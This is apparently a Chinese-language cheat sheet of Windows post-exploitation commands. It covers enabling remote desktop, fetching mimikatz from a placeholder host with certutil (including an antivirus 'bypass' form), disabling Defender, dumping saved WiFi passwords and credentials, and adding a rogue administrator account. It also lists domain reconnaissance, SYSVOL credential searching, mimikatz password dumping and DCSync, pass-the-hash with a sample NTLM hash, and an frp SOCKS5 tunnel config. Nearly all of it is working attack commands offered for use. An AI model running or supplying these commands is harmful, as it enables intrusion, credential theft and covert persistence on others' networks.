开启3389(远程桌面):

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看远程桌面端口:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

锁屏:

rundll32.exe user32.dll,LockWorkStation

远程下载:

certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe
certutil.exe && certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe    //bypass

关闭defender:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD

读取wifi密码:

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

远程桌面保存凭据:

cmdkey /list

添加用户:

net user name password /add
net localgroup administrators name /add
net user name /delete

域内信息收集:

net user /domain //获取域用户列表
net group /domain  //查询域内所有用户组列表
net group "Domain Admins" /domain //查询域管理员用户
net group "Domain Controllers" /domain  //查看域控制器
net localgroup administrators /domain  //查询域控制器上内置本地管理员组的成员

dir /s /a \\域控\sysvol\*.xml

mimikatz:

privilege::debug
sekurlsa::logonpassword(s)
lsadump::dcsync /domain:test.com /all /csv

pth:

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7

sekurlsa::pth /user:administrator /domain:xxx /ntlm:xxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"    //desktop

frp:

[common]
server_addr = xxx
server_port = xxx
token = xxx

[plugin_socks5]
type = tcp
remote_port = xxxx
plugin = socks5
plugin_user = xxx
plugin_passwd = xx

目录